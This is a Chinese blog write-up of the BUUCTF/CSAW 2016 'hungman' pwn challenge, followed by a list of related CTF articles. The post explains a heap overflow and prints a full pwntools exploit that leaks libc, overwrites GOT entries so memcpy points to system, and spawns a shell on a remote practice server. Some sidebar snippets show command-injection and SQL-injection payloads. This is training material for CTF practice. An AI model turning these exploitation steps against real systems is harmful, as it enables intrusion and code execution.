[BUUCTF-pwn] hungman_csaw_2016

最新推荐文章于 2024-08-20 10:53:37 发布
最新推荐文章于 2024-08-20 10:53:37 发布
阅读量161 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122093690
版权

学习的这个exp

先弄清楚流程:

  1. 先读入name然后根据大小建个堆块
  2. 建0x80的块用来管理:{4:score,4:name_len,8:ptr->name}
  3. 读入随机数跟name加密成a-z的字符,然后与输入相同则显示并加分
  4. 超score则可重写name,最长可写0xf8 明显溢出

思路:

  1. 随便写入A*26,然后从a猜到z肯定能成功
  2. 成功后写溢出,修改score=0,len=27,ptr=got.__libc_start_main在回显name时得到libc。因为后边要将got.memcpy表改为system所以这里选择它前边的libc_start_main
  3. 再玩一把成功后即可修改got表 libc改为/bin/sh,memcpy改为system,为防止memcpy的\0覆盖malloc再加上malloc后边有不用就不管了
  4. 再玩一把成功后会执行memcpy(name_ptr) 这时name_ptr指向/bin/sh得到shell

老外写东西不给完整的exp不过那样也挺好,这里贴上是怕我说的别人看不懂。

from pwn import *

binary = './pwn'
local = 0
if local == 1:
   p = process(binary)
   libc_elf = ELF("/home/shi/pwn/libc6_2.23/libc-2.23.so")
else:
   p = remote('node4.buuoj.cn', 29200)
   libc_elf = ELF('../libc6_2.23-0ubuntu10_amd64.so')

elf = ELF(binary)
context(arch = 'amd64', log_level='debug') #'critical'

def game():
    for i in range(ord('a'), ord('z')+1):
        line = p.recvline()
        if b'name' in line:
            break
        p.sendline(bytes([i]))

p.sendlineafter(b"What's your name?\n", b'A'*0x26)
p.recvline()
'''
heap name 0x28
heap game score,len, ptr -> got[__libc_start_main]
'''
game()
payload = b'A'*0x20 + flat(0, 0x91, p32(0x20)+p32(27), elf.got['__libc_start_main'])
p.sendline(b'y')
sleep(0.2)
p.sendline(payload)

p.recvuntil(b"Highest player: ")
libc_base = u64(p.recv(6).ljust(8, b'\x00')) - libc_elf.sym['__libc_start_main']
system = libc_base + libc_elf.sym['system']
malloc = libc_base + libc_elf.sym['malloc']
print('libc:', hex(libc_base))

'''
got  __libc_start_main,  __gmon_start__, memcpy, malloc
     /bin/sh\x00         0               system  malloc 
'''
p.sendlineafter(b"Continue? ", b'y')
game()
payload = flat(b'/bin/sh\x00', 0, system, malloc)
p.sendline(b'y')
sleep(0.2)
p.sendline(payload)

p.sendlineafter(b"Continue? ", b'y')
game()
p.sendline(b'y')
sleep(0.2)
p.sendline(b's')

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 931
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 990
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF
qq_18669681的博客
08-08 848
随便注 根据题目判断就初步判断为注入。 但还是测试 1. ‘ 报错 2.’ or ‘’=’ 回显正常 尝试进行注入时发现对注入的常用关键词都进行了过滤。 进行堆叠注入查询表名 1';show tables; 查询字段 show coloums from 查询表的内容有多种方法,我使用的是多语句执行。 1';Set @x=0x73656c65637420666c61672066726f6d20...
[CTF夺旗赛] BUUCTF N1BOOK 第一章 web入门
最新发布
Da1NtY的博客
08-20 785
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第一章,后续会陆续更新。
buuctf
灰太的表格的博客
06-14 624
[GXYCTF2019]Ping Ping Ping ![猜测为命令拼接 尝试?ip=127.0.0.1 果然是,开始构造发现空格flag被ban ${IFS} $IFS$9 < <> linux中可以用来代替空格 可以用变量拼接解决flag字符串被ban http://0022d670-8595-4aa7-bfaf-a72fbb8e84d9.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php flag在源代码里 ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4083
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1540
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
Buuctf
qq_52761202的博客
08-20 255
Http F12,发现Secret.php 访问 referer:https://www.Sycsecret.com User-Agent:Syclover browser 本地访问:127.0.0.1 开伪代理 Easy calc 看一下页面源码,发现了提示: calc.php?num=encodeURIComponent($("#content").val()) $("#content").val() 是什么意思: 获取id为content的HTML标签元素的值,是JQuery, $("#
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 434
buuctf-pwn 001-016题wp
buuctfpwn
个人笔记
04-04 3149
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 519
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 287
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3228
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 279
buuctf pwn 027-031题
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值